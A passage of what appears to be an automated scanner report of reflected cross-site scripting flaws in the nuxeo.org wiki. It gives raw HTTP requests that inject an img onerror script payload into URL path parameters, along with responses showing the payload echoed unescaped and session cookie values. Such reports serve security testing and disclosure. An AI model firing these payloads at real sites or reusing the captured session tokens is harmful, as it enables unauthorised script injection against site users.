GET /xwiki/bin/view/Main34dd9<img%20src%3da%20onerror%3dalert(1)>4dbb20e4ed3/Howto+launch+the+selenium+test+suite HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:14:01 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13258 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Main34dd9%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4dbb20e4ed3/">Main34dd9<img src=a onerror=alert(1)>4dbb20e4ed3</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adc0c"><img%20src%3da%20onerror%3dalert(1)>ff8c6314af6 was submitted in the REST URL parameter 4. This input was echoed as adc0c"><img src=a onerror=alert(1)>ff8c6314af6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Mainadc0c"><img%20src%3da%20onerror%3dalert(1)>ff8c6314af6/Howto+launch+the+selenium+test+suite HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:13:34 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13324 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Mainadc0c%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eff8c6314af6/Howto+launch+the+selenium+test+suite?format=xar&name=Mainadc0c"><img src=a onerror=alert(1)>ff8c6314af6.Howto launch the selenium test suite&pages=Mainadc0c"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9017"><img%20src%3da%20onerror%3dalert(1)>b19d426ad36 was submitted in the REST URL parameter 5. This input was echoed as d9017"><img src=a onerror=alert(1)>b19d426ad36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suited9017"><img%20src%3da%20onerror%3dalert(1)>b19d426ad36 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:14:52 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13308 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... tp://www.nuxeo.org/xwiki/bin/export/Main/Howto+launch+the+selenium+test+suited9017%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eb19d426ad36?format=xar&name=Main.Howto launch the selenium test suited9017"><img src=a onerror=alert(1)>b19d426ad36&pages=Main.Howto launch the selenium test suited9017"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2b2fb<img%20src%3da%20onerror%3dalert(1)>5aad0972571 was submitted in the REST URL parameter 5. This input was echoed as 2b2fb<img src=a onerror=alert(1)>5aad0972571 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite2b2fb<img%20src%3da%20onerror%3dalert(1)>5aad0972571 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:37 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13246 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite2b2fb%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5aad0972571'>Howto launch the selenium test suite2b2fb<img src=a onerror=alert(1)>5aad0972571</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 601dd<img%20src%3da%20onerror%3dalert(1)>5ae4cf92fe7 was submitted in the REST URL parameter 4. This input was echoed as 601dd<img src=a onerror=alert(1)>5ae4cf92fe7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main601dd<img%20src%3da%20onerror%3dalert(1)>5ae4cf92fe7/JCRMigration HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:14:31 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12936 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Main601dd%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5ae4cf92fe7/">Main601dd<img src=a onerror=alert(1)>5ae4cf92fe7</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69a0c"><img%20src%3da%20onerror%3dalert(1)>c19e02784b was submitted in the REST URL parameter 4. This input was echoed as 69a0c"><img src=a onerror=alert(1)>c19e02784b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main69a0c"><img%20src%3da%20onerror%3dalert(1)>c19e02784b/JCRMigration HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:13:46 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12989 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main69a0c%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec19e02784b/JCRMigration?format=xar&name=Main69a0c"><img src=a onerror=alert(1)>c19e02784b.JCRMigration&pages=Main69a0c"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dc44"><img%20src%3da%20onerror%3dalert(1)>62e95f58fe5 was submitted in the REST URL parameter 5. This input was echoed as 2dc44"><img src=a onerror=alert(1)>62e95f58fe5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/JCRMigration2dc44"><img%20src%3da%20onerror%3dalert(1)>62e95f58fe5 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:01 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12986 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/JCRMigration2dc44%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E62e95f58fe5?format=xar&name=Main.JCRMigration2dc44"><img src=a onerror=alert(1)>62e95f58fe5&pages=Main.JCRMigration2dc44"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d9d25<img%20src%3da%20onerror%3dalert(1)>6e390cba6e2 was submitted in the REST URL parameter 5. This input was echoed as d9d25<img src=a onerror=alert(1)>6e390cba6e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/JCRMigrationd9d25<img%20src%3da%20onerror%3dalert(1)>6e390cba6e2 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:45 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12924 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigrationd9d25%3Cimg+src%3Da+onerror%3Dalert%281%29%3E6e390cba6e2'>JCRMigrationd9d25<img src=a onerror=alert(1)>6e390cba6e2</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f7d4"><img%20src%3da%20onerror%3dalert(1)>d2d6af453d5 was submitted in the REST URL parameter 4. This input was echoed as 6f7d4"><img src=a onerror=alert(1)>d2d6af453d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main6f7d4"><img%20src%3da%20onerror%3dalert(1)>d2d6af453d5/Nuxeo+Testing+Framework HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:13:32 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13149 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main6f7d4%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed2d6af453d5/Nuxeo+Testing+Framework?format=xar&name=Main6f7d4"><img src=a onerror=alert(1)>d2d6af453d5.Nuxeo Testing Framework&pages=Main6f7d4"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1e829<img%20src%3da%20onerror%3dalert(1)>4dac70b73d4 was submitted in the REST URL parameter 4. This input was echoed as 1e829<img src=a onerror=alert(1)>4dac70b73d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main1e829<img%20src%3da%20onerror%3dalert(1)>4dac70b73d4/Nuxeo+Testing+Framework HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:14:26 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13083 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Main1e829%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4dac70b73d4/">Main1e829<img src=a onerror=alert(1)>4dac70b73d4</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fd33a<img%20src%3da%20onerror%3dalert(1)>04410ba00e3 was submitted in the REST URL parameter 5. This input was echoed as fd33a<img src=a onerror=alert(1)>04410ba00e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/Nuxeo+Testing+Frameworkfd33a<img%20src%3da%20onerror%3dalert(1)>04410ba00e3 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:16:18 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13071 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Frameworkfd33a%3Cimg+src%3Da+onerror%3Dalert%281%29%3E04410ba00e3'>Nuxeo Testing Frameworkfd33a<img src=a onerror=alert(1)>04410ba00e3</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe512"><img%20src%3da%20onerror%3dalert(1)>8ca69496434 was submitted in the REST URL parameter 5. This input was echoed as fe512"><img src=a onerror=alert(1)>8ca69496434 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/Nuxeo+Testing+Frameworkfe512"><img%20src%3da%20onerror%3dalert(1)>8ca69496434 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:10 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13133 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/Nuxeo+Testing+Frameworkfe512%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8ca69496434?format=xar&name=Main.Nuxeo Testing Frameworkfe512"><img src=a onerror=alert(1)>8ca69496434&pages=Main.Nuxeo Testing Frameworkfe512"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3d601<img%20src%3da%20onerror%3dalert(1)>573ef0b70f0 was submitted in the REST URL parameter 4. This input was echoed as 3d601<img src=a onerror=alert(1)>573ef0b70f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main3d601<img%20src%3da%20onerror%3dalert(1)>573ef0b70f0/NuxeoDevGettingStarted HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:14:40 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13066 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Main3d601%3Cimg+src%3Da+onerror%3Dalert%281%29%3E573ef0b70f0/">Main3d601<img src=a onerror=alert(1)>573ef0b70f0</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4eff"><img%20src%3da%20onerror%3dalert(1)>f1fa6463d0e was submitted in the REST URL parameter 4. This input was echoed as a4eff"><img src=a onerror=alert(1)>f1fa6463d0e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Maina4eff"><img%20src%3da%20onerror%3dalert(1)>f1fa6463d0e/NuxeoDevGettingStarted HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:13:46 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13132 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Maina4eff%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef1fa6463d0e/NuxeoDevGettingStarted?format=xar&name=Maina4eff"><img src=a onerror=alert(1)>f1fa6463d0e.NuxeoDevGettingStarted&pages=Maina4eff"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f7c6d<img%20src%3da%20onerror%3dalert(1)>83bdae15118 was submitted in the REST URL parameter 5. This input was echoed as f7c6d<img src=a onerror=alert(1)>83bdae15118 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
